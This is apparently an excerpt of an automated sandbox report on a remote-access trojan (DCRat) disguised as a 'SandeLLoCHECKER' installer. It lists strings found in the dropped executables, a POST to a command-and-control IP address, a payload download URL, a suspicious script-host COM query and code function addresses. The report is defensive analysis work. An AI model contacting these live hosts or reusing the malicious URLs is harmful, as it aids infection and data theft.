                                    Source: unknownHTTP traffic detected: POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 185.246.67.73Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.246.67.73
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003427000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdat
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.246.67.73d
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.246H
                                    Source: gorkmTnChA.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                    Source: gorkmTnChA.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                    Source: gorkmTnChA.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                    Source: gorkmTnChA.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                    Source: gorkmTnChA.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                    Source: gorkmTnChA.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1729821390.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1729996940.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1729051737.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1729286313.0000000004D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                                    Source: SandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1729136751.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1730081559.0000000000E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7c1528bf45933
                                    Source: gorkmTnChA.exeString found in binary or memory: http://ocsp.digicert.com0A
                                    Source: gorkmTnChA.exeString found in binary or memory: http://ocsp.digicert.com0C
                                    Source: gorkmTnChA.exeString found in binary or memory: http://ocsp.digicert.com0X
                                    Source: webDriverintoDll.exe, 0000000B.00000002.1844340465.00000000031DA000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.semkrill.ru/
                                    Source: gorkmTnChA.exeString found in binary or memory: https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7z
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7z4p
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: SandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.semkrill.ru/
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.semkrill.ru/=
                                    Source: SandeLLoCHECKER_Installer.msi.3.drString found in binary or memory: https://discord.semkrill.ru/AI_CLEAN_RESOURCES_USER_PROMPT_BASIC_UI0AI_APP_FILE
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.semkrill.ru/g
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.semkrill.ru/h
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: gorkmTnChA.exeString found in binary or memory: https://sandello.ru
                                    Source: SandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2898761896.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/contact
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/contact(
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/contact(5h
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707913300.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.msi.3.drString found in binary or memory: https://semkrill.ru/contactWindowsTypeNT40DisplayWindows
                                    Source: SandeLLoCHECKER_Installer.exe, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707579064.0000000000E34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/support
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1707913300.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.msi.3.drString found in binary or memory: https://semkrill.ru/supportAI_SHORTCUTTABLE_FLAGSCOLUMNAQAAAA8AAABTAGEAbgBkAGUATABMAG8AQwBIAEUAQwBLA
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732047913.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732107004.0000000004D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/supportEY
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/supporth1h
                                    Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://semkrill.ru/supporthPh
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                    Source: unknownHTTPS traffic detected: 172.67.184.109:443 -> 192.168.2.4:49730 version: TLS 1.2
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009A69A0 NtdllDefWindowProc_W,3_2_009A69A0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0091D900 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,3_2_0091D900
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008583D0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,3_2_008583D0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00856460 NtdllDefWindowProc_W,3_2_00856460
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008766A0 NtdllDefWindowProc_W,3_2_008766A0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00858AF0 NtdllDefWindowProc_W,3_2_00858AF0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00868BB0 NtdllDefWindowProc_W,3_2_00868BB0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008590B0 NtdllDefWindowProc_W,3_2_008590B0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008B5450 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,3_2_008B5450
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008635D0 KillTimer,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,3_2_008635D0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008556E0 GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,3_2_008556E0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0085F6E0 NtdllDefWindowProc_W,3_2_0085F6E0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0085F850 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,3_2_0085F850
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00855E00 SysFreeString,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,NtdllDefWindowProc_W,SysFreeString,3_2_00855E00
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00901F80 NtdllDefWindowProc_W,3_2_00901F80
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_00496FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_00496FAA
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_0049848E1_2_0049848E
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004940FE1_2_004940FE
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004A40881_2_004A4088
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004A00B71_2_004A00B7
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004A71531_2_004A7153
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004B51C91_2_004B51C9
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004A62CA1_2_004A62CA
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004932F71_2_004932F7
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004A43BF1_2_004A43BF
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004BD4401_2_004BD440
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_0049F4611_2_0049F461
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_0049C4261_2_0049C426
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004A77EF1_2_004A77EF
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_0049286B1_2_0049286B
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004BD8EE1_2_004BD8EE
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004C19F41_2_004C19F4
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_0049E9B71_2_0049E9B7
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004A6CDC1_2_004A6CDC
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004A3E0B1_2_004A3E0B
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_0049EFE21_2_0049EFE2
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004B4F9A1_2_004B4F9A
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009866E03_2_009866E0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0097A8503_2_0097A850
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009689C03_2_009689C0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009B30F03_2_009B30F0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0099F2B03_2_0099F2B0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A0C1E03_2_00A0C1E0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A001103_2_00A00110
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0087C2103_2_0087C210
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008703403_2_00870340
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A2E34A3_2_00A2E34A
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009444C03_2_009444C0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0086C5A13_2_0086C5A1
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009886003_2_00988600
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009668403_2_00966840
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008B89F03_2_008B89F0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A1E95C3_2_00A1E95C
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0086EB803_2_0086EB80
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00972BE03_2_00972BE0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A32DC93_2_00A32DC9
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A30EA13_2_00A30EA1
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00842EA03_2_00842EA0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00878E003_2_00878E00
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0086CF433_2_0086CF43
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A391B43_2_00A391B4
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008453523_2_00845352
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008654703_2_00865470
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0093F7C03_2_0093F7C0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008474C03_2_008474C0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_008697603_2_00869760
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00861A203_2_00861A20
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0085FC903_2_0085FC90
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00877D643_2_00877D64
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00A25FA03_2_00A25FA0
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_00869F903_2_00869F90
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeCode function: 11_2_00007FFD9B020DB411_2_00007FFD9B020DB4
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeCode function: 11_2_00007FFD9B1D03F211_2_00007FFD9B1D03F2
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeCode function: 11_2_00007FFD9B1E3BF411_2_00007FFD9B1E3BF4
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeCode function: 11_2_00007FFD9B1D044011_2_00007FFD9B1D0440
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeCode function: 11_2_00007FFD9B1D043811_2_00007FFD9B1D0438
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeCode function: 11_2_00007FFD9B1D0D0D11_2_00007FFD9B1D0D0D
                                    Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exeCode function: 11_2_00007FFD9B1E3CE811_2_00007FFD9B1E3CE8
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeCode function: 35_2_00007FFD9B02BA8D35_2_00007FFD9B02BA8D
